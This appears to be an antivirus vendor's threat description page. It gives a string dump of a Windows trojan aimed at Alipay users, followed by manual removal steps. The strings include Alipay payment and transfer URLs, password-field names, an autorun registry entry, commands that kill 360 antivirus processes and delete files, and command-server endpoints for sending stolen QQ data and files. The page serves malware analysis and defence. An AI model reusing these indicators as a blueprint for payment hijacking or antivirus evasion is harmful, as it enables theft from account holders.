hXXps://authzth.alipay.com/login/certcheck.htm/
hXXps://auth.alipay.com/login/index.htm/
hXXps://auth.alipay.com/
hXXp://VVV.baidu.com/link/
hXXp://auth.alipay.com/login/index.htm/
hXXp://auth.alipay.com/
hXXps://tbapi.alipay.com/trade/trade_payment.htm/
hXXps://cashierzue.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzue.alipay.com/preprocess/trade/tradepreprocessgw.htm/
hXXp://buyer.trade.taobao.com/trade/pay.htm/
hXXps://cashierzue.alipay.com/standard/gateway/ebankpay.htm/
hXXps://cashierztg.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzui.alipay.com/standard/payment/bankcardform.htm/
hXXps://cashierzui.alipay.com/standard/gateway/ebankpay.htm/
hXXps://VVV.alipay.com/
hXXp://VVV.alipay.com/
hXXp://mse.sogou.com/app/features/feichuan.h
CREATE TABLE MultiCorePatternUrl (url VARCHA
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INTEGER)-
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)}
1indexMultiCorePatternUrl_client_id_indexMultiCorePatternUrl
CREATE INDEX MultiCorePatternUrl_client_id_index ON MultiCorePatternUrl(client_id)
hXXp://mse.sogou.com/app/features/feichuan.html/
hXXps://consumeprod.alipay.com/record/standard.htm/
hXXps://consumeprod.alipay.com/record/index.htm/
Software\Tencent\QQBrowser\Advanced\EnableChromeTab
alipay_jmp.txt
Software\Classes\360seURL\Application\ApplicationIcon
Software\Microsoft\Windows\CurrentVersion\Uninstall\360Chrome\DisplayIcon
hXXps://shenghuo.alipay.com/transfercore/validateTransferSuperBankFlow.json
hXXps://shenghuo.alipay.com/transfercore/fill.htm
hXXps://omeo.alipay.com/service/checkcode?sessionID=
SESSIONkEY
-12027,TEAKEY
&payChannel=0100&supportTime=
hXXps://shenghuo.alipay.com/transfercore/confirmSuperNet.htm
supportTime
passConfirmCheck
:yhk_error03.html-----------------------------
c:\yhkerror03.html
&passConfirmCheck=
&supportTime=
hXXps://shenghuo.alipay.com/transfercore/fillAction.htm
payment/cashier.htm?orderId=
yhk_error02.html
:yhk_error02.html-----------------------------
hXXps://lab.alipay.com/consume/record/inpour.htm
hXXps://financeprod.alipay.com/fund/asset.htm
[email protected]
yhk_error01.html
:yhk_error01.html
yhkok.html
[yhkok.html]
yhk_error03.html
hXXps://shenghuo.alipay.com/send/payment/fill.htm
&title=תÕË&memo=&smsNo=
hXXps://shenghuo.alipay.com/send/payment/submit.htm
pageAbsUrl:"hXXp://shenghuo.alipay.com/send/confirm.htm?orderId=
hXXps://shenghuo.alipay.com/send/confirm.htm
dingdan.html
:dingdan.html
zfb_ssid_error01.html
zfb_ssid_error01.html
yhdd.html
hXXps://cashierzth.alipay.com/standard/payment/bankCardForm.htm
.htm?outBizNo=
hXXps://cashierzth.alipay.com/standard/gateway/ebankPay.htm?outBizNo=
alipay_yhzf_error01.txt
:alipay_yhzf_error01.txt
function time(){return new Date().getTime()}
hXXps://authztg.alipay.com/login/homeB.htm
password_input
password
J-login-btn
personalweb.alipay.com
:login_error01.txt
login_error01.txt
Y@hXXps://consumeprod.alipay.com/record/standard.htm
hXXps://consumeprod.alipay.com/record/delete.json?record=
alipay.com
cashier.htm
zfb_error01.txt
:zfb_error01.txt
payment/cashier.htm
error.htm
:zfb_error02.txt
zfb_error02.txt
tcresult.htm
ebitexpresspay.htm
waitresult.htm
payresult.htm
:zf_error01.txt
zf_error01.txt
:zf_error02.txt
zf_error02.txt
c:\1242421.txt
hXXp://
hXXps://
hXXps://yebprod.alipay.com/yeb/quickRedeemApply.htm
:yeb_error01.txt
yeb_error01.txt
quickRedeemResult.htm
url!!
quickRedeemApply.htm
:yeb_error02.txt
yeb_error02.txt
hXXps://personalportal.alipay.com/portal/account/index.htm
hXXps://zht.alipay.com/asset/assetStatistics.json?_input_charset=utf-8&categoryType=FASTPAYSERVICE&t=
hXXps://shenghuo.alipay.com/transfer/deposit/depositPreprocessGw.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositCardForm.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositAmountValidate.json
hXXps://cashierzui.alipay.com/standard/gateway/ebankDeposit.json
url":"
,URL:
hXXps://shenghuo.alipay.com/transfer/ac/acFill.htm
function document.onkeydown()
if ( event.keyCode==9)
event.keyCode = 0;
event.cancelBubble = true;
s_sc.php?mac=
test.txt
s_start.php?mac=
&ping 127.0.0.1 -n 2&del /q "
cmd /c taskkill /F /IM
s_submitqq.php?mac=
360sd.exe
360safe.exe
s_sendsd.php?mac=
\svchost.exe
@>c:\cmd.txt
cmd /c
c:\cmd.txt
shell/setshell.php
s_subitqq.php?mac=
@/desk/desk_get.php
s_getbox.php?mac=
/file/sendfile.php?mac=
update/check.php?check=1.3
\update.exe
[email protected]
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
WinExec
GetKeyState
GetViewportOrgEx
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
ShellExecuteA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.0
HTTP/1.1
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADUUWiseHelper.dll
>0123456789ABCDEF deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
iphlpapi.dll
MPR.dll
VERSION.dll
RASAPI32.dll
GetWindowsDirectoryA
ExitWindowsEx
RegCreateKeyA
RegOpenKeyA
oledlg.dll
WSOCK32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
%x.tmp
icmp.dll
(*.htm;*.html)|*.htm;*.html
VVV.dywt.com.cn
%s\%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
X-X-X-X-X-X
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
1.0.6
\shell32.dll
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
NULL row buffer for row %ld, pass %d
libpng error: %s
libpng warning: %s
Unknown zTXt compression type %d
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
%s: Cannot open
%s: Write error at scanline %lu
%s: Seek error at scanline %lu
%u: Sample out of range, max %u
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%f: Bad value for "%s"
%s: Invalid %stag "%s" (not supported by codec)
TIFFVSetField ... pass by value not imp.
%ld: Bad value for "%s"
%d: Bad value for "%s"
Nonstandard tile length %d, convert file
Nonstandard tile width %d, convert file
Bad value %ld for "%s" tag ignored
%s: Invalid InkNames value; expecting %d names, found %d
TIFFVGetField ... pass by value not imp.
Sorry, can not handle images with %d-bit samples
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, LogL data must have %s=%d
Sorry, can not handle separated image with %s=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle YCbCr images with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Missing needed %s tag
Sorry, can not image with %d-bit samples
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Sample %d out of range, max %u
Internal error, unknown tag 0x%x
Tag %d
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: Data buffer too small to hold tile %ld
%s: No space for data buffer at scanline %ld
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is no longer implemented due to Unisys patent enforcement
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
Compression algorithm does not support random access
Bogus "%s" field, ignoring and calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
wrong data type %d for "%s"; tag ignored
unknown field with tag %d (0x%x) encountered
No space %s
TIFF directory is missing required "%s" field
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %lu)
Cannot handle different per-sample values for field "%s"
cannot read TIFF_ANY type %d for field "%s"
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Error writing data for field "%s"
%s: Error writing SubIFD directory link
%s compression support is not configured
?%s: No space for LogLuv state block
Inappropriate photometric interpretation %d for SGILog compression; %s
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for state block
%s: Bad code word at scanline %d (x %lu)
%s: %s at scanline %d (got %lu, expected %lu)
%s: Premature EOF at scanline %d (x %lu)
%s: No space for Group 3/4 reference line
%s: No space for Group 3/4 run arrays
%s: Uncompressed data (not supported) at scanline %d (x %lu)
Fax SubAddress: %s
(%u = 0x%x)
%suncompressed data
%sEOL padding
%s2-d encoding
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
PackBitsDecode: discarding %d bytes to avoid buffer overrun
LZWDecode: Not enough data at scanline %d (short %d bytes)
LZWDecode: Strip %d not terminated with EOI code
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %d bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
"Predictor" value %d not supported
%u (0x%x)
.PAVCOleException@@
.PAVCOleDispatchException@@
c:\%original file name%.exe
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
hXXp://s1.uudati.com:
hXXp://s1.taskok.com:
hXXp://s1.uudama.com:
hXXp://s1.uuwise.com:
/Api/config.aspx
2.0.0.4
WiseClientAPI-2.0.0.4
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::_IsNeedLogin
/Api/DecodeImg.aspx
xxxxxxxxxxx
hXXp://p1.uuwise.net:
hXXp://p1.uudama.net:
hXXp://p1.taskok.com:
hXXp://p1.uuwise.com:
hXXp://p1.uudama.com:
CCaptchaRecognizer::easyRecognizeUrl
%d%d%d%d%d
CCaptchaRecognizer::_CalcRandomPort
/Api/VerifyAPIFile.aspx
/Api/UserLogin.aspx
CCaptchaRecognizer::login
/Api/UserReg.aspx
/Api/PayCard.aspx
/Api/ReportError.aspx
CCaptchaRecognizer::reportError
/Api/UserPoint.aspx
|2.0.0.4|
/Api/DecodeResult.aspx
ID/KEY/
ByTypeBytes.JPG
%d-%d-%d
CHttpRequestHelper::_ReadResponse
User-Agent:WiseClient-2.0.0.4;
WiseClient-2.0.0.4
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestPost
ServerPort
UUExtConfig.ini
-:-:-.%d
tCRYPTDLL.DLL
3.cn.pool.ntp.org
2.cn.pool.ntp.org
1.cn.pool.ntp.org
0.cn.pool.ntp.org
cn.pool.ntp.org
\\.\PHYSICALDRIVE0
Microsoft Windows Millennium Edition
Microsoft Windows 98
Microsoft Windows 95
%s (Build %d)
Service Pack 6a (Build %d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Web Edition
Service Pack %d (Build %d)
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003,
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 "R2"
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
ox-x-x-x-x-x
\Tencent\Users\*.*
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
!"#$%&'()* ,-.
uuwise.com
2, 0, 0, 4
1.0.0.1
123456789
(*.*)
1.0.0.0
(hXXp://VVV.eyuyan.com)






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:348
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
    C:\UUWiseHelper.dll (290 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "alipay" = "c:\%original file name%.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now